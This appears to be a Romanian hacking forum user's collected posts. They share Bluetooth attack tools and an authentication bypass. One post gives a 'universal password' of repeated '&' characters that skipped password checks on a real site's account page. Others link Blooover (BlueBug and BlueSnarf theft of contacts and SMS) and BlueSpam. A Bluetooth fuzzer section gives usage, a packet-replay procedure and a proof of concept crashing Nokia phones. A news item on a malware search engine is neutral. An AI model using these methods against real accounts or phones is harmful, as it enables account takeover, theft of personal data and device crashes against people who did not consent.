MiniDisc

1) poti sa citesti agenda ,sa trimiti/citesti smsurile de pe telefonul vul si multe alte chestii 2)da ,merge pe ori ce tel care are java 3) aici nush

mi-a dat 129 , la altu mi-a arata 165

ms mult , mai trebuie un cont pe rapidshare si fac download non stop

interesant , pacat ca nu mai merge , btw ms

parola era "&" ,dar poti sa bagi cati de & vrei , minim 4 ex: &&&&

In timp ce ma jucam cu live http header am descoperit o vulnerabilitate pe situ my.neogen.ro , cand un user vrea sa isi schimbe mailu sau alte informatii intra la date personale dar trebuie sa introduca parola ,eu am gasit o parola " universala " cu care poti sa intri la "date personale"fara sa ii stii parola, metoda nu mai merge din cauza unui turnator care sa laudat la mariana dar poate descoperiti voi alta , enjoy http://rapidshare.ro/download.php?id=Jvlg3XTRQUkPhkWFnNbz

bv Nemessis ,tot neogenu e plin de xss sau alte vulnerabilitati o sa vb cu kw3rln sa postez ceva tare la vip , legat de 210

ma bag si eu ,pot sa ajut cu programe wireless (wi-fi ,bluetooth )

Dj Allexander - It's Like That (Promo Mix August 2006) , tine vreo 120 minute

ce tare e baba

wow ,23 , o adevarata colectie , ms

al doilea link nu merge si inca ceva sigur nu e vb de md5 si nu de md2 ?

dai sa caute cuvatu "hack" mi-e imi arata cateva pe acolo

dap ,situ asta le cauta si iti spune ce virusi contine

http://www.wardrivers.be/files/software/wardrivecd/

l-am uploadat pe http://www.rapidshare.ro/download.php?id=y...ph4WzPISH ,enjoy btw, ms Razvan

Instrument pentru cautarea de malware pe Google Instrument pentru cautarea de malware pe Google Creatorul instrumentului de hacking Metasploit a lansat pe internet un cod care poate fi utilizat pentru cautarea de software malitios prin utilizarea unor termeni de cautare speciali pe Google. Motorul de cautare de malware creat de H.D. Moore poate fi gasit aici: LINK: http://metasploit.com/research/misc/mwsear...arch/index.html Motorul de cautare al Google indexeaza nu numai fisiere de tip PDF sau HTML (de exemplu), ci si fisiere executabile. Multe, dar nu toate, corespund unor site-uri de download legale. Motorul de cautare de malware al lui Moore a fost codat cu aproximativ 300 de semnaturi de malware, urmând ca aceasta baza sa fie extinsa. Motorul de cautare cauta pe internet fisierele executabile asociate cu aceste semnaturi. Lansarea acestui „utilitar� a fost în parte determinata de o cercetare recenta a companiei de securitate Websense, care a avertizat ca Google poate fi utilizat pentru cautarea de malware. Spre deosebire de Moore, Websense nu a lansat public exemple de cod, dar a oferit o imagine despre modul de distribuire a codurilor malitioase pe web. Websense a colectat mii de coduri malitioase, majoritatea acestora fiind postate pe newsgroup-uri cu nume false al caror scop este cel de a determina utilizatorii sa execute virusi prezentati drept crack-uri software sau imagini pornografice. Compania a gasit de asemenea malware pe forumuri, site-uri compromise si site-uri de hacking underground. Websense a depistat de asemenea diverse programe spyware pe site-uri de poker.       Websense nu a considerat riscul reprezentat de indexarea de catre Google a programelor malware ca fiind ridicat, dar a avertizat ca aceasta caracteristica ar putea fi exploatata de catre autorii de malware. Google a anuntat ca lucreaza la blocarea rezultatelor cautarilor care duc catre programele malitioase. Proiectul Metasploit ofera informatii despre vulnerabilitatile de securitate si dezvolta instrumente care ajuta la testele de penetrabilitate si contribuie de asemenea la dezvoltarea semnaturilor utilizate de produsele de detectare a intruziunilor. Utilizat în mod legal, Metasploit le permite consultantilor de securitate sa identifice si sa remedieze vulnerabilitatile de securitate. Instrumentul poate fi însa utilizat si de catre hackerii care cauta vulnerabilitatile de securitate. Sursa: Chip

btscanner 2.1 btscanner 2.1 contains minor bugfixes over 2.0, specifically related to the use of multiple dongles when scanning. http://www.pentest.co.uk/src/btscanner-2.1.tar.bz2 btscanner 2.0 btscanner 2.0 is a completely revamped version of the original. With all the features of 1.0, version 2.0 now boasts the ability to do brute force scans of OUI ranges. Both inquiry and brute force scan types are able to utilise multiple dongles to increase coverage and the chance of finding a device. Additional features include the ability to export the scan results to a text file and improved sorting. A detailed information screen extracts HCI and SDP information, and maintains an open connection to monitor the RSSI and link quality. btscanner is based on the BlueZ Bluetooth stack, which is included with recent Linux kernels, and the BlueZ toolset. btscanner also contains a complete listing of the IEEE OUI numbers and class lookup tables. Using the information gathered from these sources it is possible to make educated guesses as to the host device type. http://www.pentest.co.uk/src/btscanner-2.0.tar.bz2 btscanner 1.0 btscanner is a tool designed specifically to extract as much information as possible from a Bluetooth device without the requirement to pair. A detailed information screen extracts HCI and SDP information, and maintains an open connection to monitor the RSSI and link quality. btscanner is based on the BlueZ Bluetooth stack, which is included with recent Linux kernels, and the BlueZ toolset. btscanner also contains a complete listing of the IEEE OUI numbers and class lookup tables. Using the information gathered from these sources it is possible to make educated guesses as to the host device type. http://www.pentest.co.uk/src/btscanner-1.0.tar.gz

BTScanner for XP is a Bluetooth environment auditing tool for Microsoft Windows XP, implemented using the bluecove libraries (an open source implementation of the JSR-82 Bluetooth API for Java). Requirements : Windows XP Service Pack 2 with a Microsoft Windows supported Bluetooth driver. This will not work with the WIDCOMM Bluetooth stack. http://www.pentest.co.uk/src/btscanner_1_0_0.zip

BSS (Bluetooth Stack Smasher) is a L2CAP layer Fuzzer for Linux, distributed under GPL licence. BSS requires the standard bluetooth library. BSS Usage : Usage: ./bss [-s size] [-m mode] [-p pad_byte for modes 1-11] [-M maxcrash] Modes : 0 All mode listed below 1 L2CAP_COMMAND_REJ 2 L2CAP_CONN_REQ 3 L2CAP_CONN_RSP 4 L2CAP_CONF_REQ 5 L2CAP_CONF_RSP 6 L2CAP_DISCONN_REQ 7 L2CAP_DISCONN_RSP 8 L2CAP_ECHO_REQ 9 L2CAP_ECHO_RSP 10 L2CAP_INFO_REQ 11 L2CAP_INFO_RSP 12 L2CAP Random Fuzzing (-s: max_size) (-M: crashcount) BSS Example: ./bss -s 100 -m 12 -M 0 XX:@X:@X:@X:@X:@X This example sends short random (mode 12) packets (maxsize is set to 100 bytes), in an infinite loop (-M 0). Performs several L2CAP checks sending malicious packets (L2CAP) Initial source code analysis from tanya tool (tbear) Other example of use (short random L2CAP packets): ./bss -s 50 -m 12 00:12:EE:@X:@X:@X ....... 00:12:EE:@X:@X:@X BT stack may have crashed. This device seems to be vulnerable to buggy packets. Please, ensure that the device has really crashed doing a bt scan for instance. Host 00:12:EE:@X:@X:@X Packet size 11 Packet dump 0x75 0x3F 0x1E 0x3B 0x0B 0xBD 0xC4 0x98 0xBB 0x72 0xD0 char replay_buggy_packet[]="x75x3Fx1Ex3Bx0BxBD xC4x98xBBx72xD0"; Then, try to ensure that this packet is responsible (and only this one :sometimes, cellphones crash because of multiple packets, or flooding effects) : cd replay_packet Edit replay_l2cap_packet.c and modify SIZE and replay_buggy_packet : #define SIZE 11 char replay_buggy_packet[]="x75x3Fx1Ex3Bx0BxBDxC4x98xBBx72xD0"; Then, type make : make and try this packet against your equipment : ./replay_l2cap_packet 00:12:EE:@X:@X:@X TIPS: * In order to benchmark BT implementation, you may want to use time command :   time ./bss -m 12 00:12:EE:@X:@X:@X * You may increase -M value, which allows you to go on fuzzing even if some packets have not been sent to the equipment : some devices may crash because of flooding for instance. 0 means an infinite loop. Download: http://www.secuobs.com/bss-0.6.tar.gz

Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default. Lots of users use it with several other devices (earsets, GPS systems, and so on). More information about these devices on http:[click] This flaw was found using the BSS tool ( Bluetooth Stack Smasher : http:[click] ). According to the firmware version and to the model, the device can be halted or can display a "System error" message ( http:[click] ) Other Nokia devices may be affected and should be tested with bss fuzzer. Solution is to switch off bluetooth on the phone. A firmware upgrade may be distributed later by vendor. Proof of Concept : ------------------ # l2ping -c 3 00:15:A0:@X:@X:@X Ping: 00:15:A0:@X:@X:@X from 00:20:E0:75:83:DA (data size 44) ... 0 bytes from 00:15:A0:@X:@X:@X id 0 time 64.18ms 0 bytes from 00:15:A0:@X:@X:@X id 1 time 43.94ms 0 bytes from 00:15:A0:@X:@X:@X id 2 time 37.25ms 3 sent, 3 received, 0% loss # ./bss -m 12 -s 1000 00:15:A0:@X:@X:@X (... snip ...) # l2ping -c 1 00:15:A0:@X:@X:@X Ping: 00:15:A0:@X:@X:@X from 00:20:E0:75:83:DA (data size 24b) ... no response from 00:80:37:ZZ:ZZ:ZZ id 0 1 sent, 0 received, 100% loss BSS v0.6 http://www.secuobs.com/bss-0.6.tar.gz asa arata display-ul telefonului dupa atac

Blooover II is the successor of the very popular application Blooover. After 150000 downloads of Blooover within the year 2005 (since the initial release in at 21c3 in December 2004), a new version of this mobile phone auditing toool is on its ready. Besides the BlueBug attack, Blooover II supports the HeloMoto attack (which is quite close to the BlueBug attack), the BlueSnarf and the sending of malformed objects via OBEX. Download: http://trifinite.org/Downloads/Blooover2.jar http://trifinite.org/Downloads/Blooover2b.jar (Breeeder edition)

BlueSpam searches for all discoverable bluetooth devices and sends a file to them (spams them) if they support OBEX. By default a small text will be send. To customize the message that should be send you need a palm with an SD/MMC card, then you create the directory /PALM/programs/BlueSpam/Send/ and put the file (any type of file will work .jpg is allways fun) you would like to send into this directory. Activity is logged to /PALM/programs/BlueSpam/Log/log.txt. BlueSpam also supports backfire, if you put your palm into discoverable and connectable mode, BlueSpam will intercept all connection attempts by other bluetooth devices and starts sending a message back to the sender. Download: Code: http://www.mulliner.org/palm/bluespam.php

Since Adam Laurie's BlueSnarf experiment and the subsequent BlueBug experiment it is proven that some Bluetooth-enabled phones have security issues. Until now, attackers need laptops for the snarfing of other people's information. Unless attackers do a long-distance-snarf, people would see that there is somebody with a laptop trying to do strange things. Blooover is a proof-of-concept tool that is intended to run on J2ME-enabled cell phones that appear to be comparably seamless. Blooover is a tool that is intended to serve as an audit tool that people can use to check whether their phones and phones of friends and employees are vulnerable. Since the application runs on handheld devices and sucks information, it has been called Blooover (derived from Bluetooth Hoover). We had some objections to release a tool that actually does a bluebug-attack before eventual victims were not in the position of doing something against it. Now, that Nokia announced a f irmware upgrade for their vulnerable models, these objections are no longer present. Downloads Here you find the Blooover tool as a .jar file for download. It is supposed to run on every phone that is equipped with a J2ME MIDP 2.0 VM and an implemented JSR-82 API (important for Bluetooth access). As far as I know, the Nokia 6600, Nokia 7610, Sony Ericsson P900, Siemens S65 (and probably al consequent phones of the mentioned manufacturers) do fulfill these requirements. http://trifinite.org/Downloads/Blooover.jar Installation When you intend to install the application, you should be using a phone that has the Java Bluetooth API implemented. Phones with this feature are listed on this, very useful page. Once you downloaded the file, make sure that it is called Bloover.jar (not Blooover.zip). After this you can either transfer the application to your phone via (1) the phone software on your pc, or (2) via Obex Push over Bluetooth or (3) via OTA (over-the-air application provisioning) which will use your phone's data services.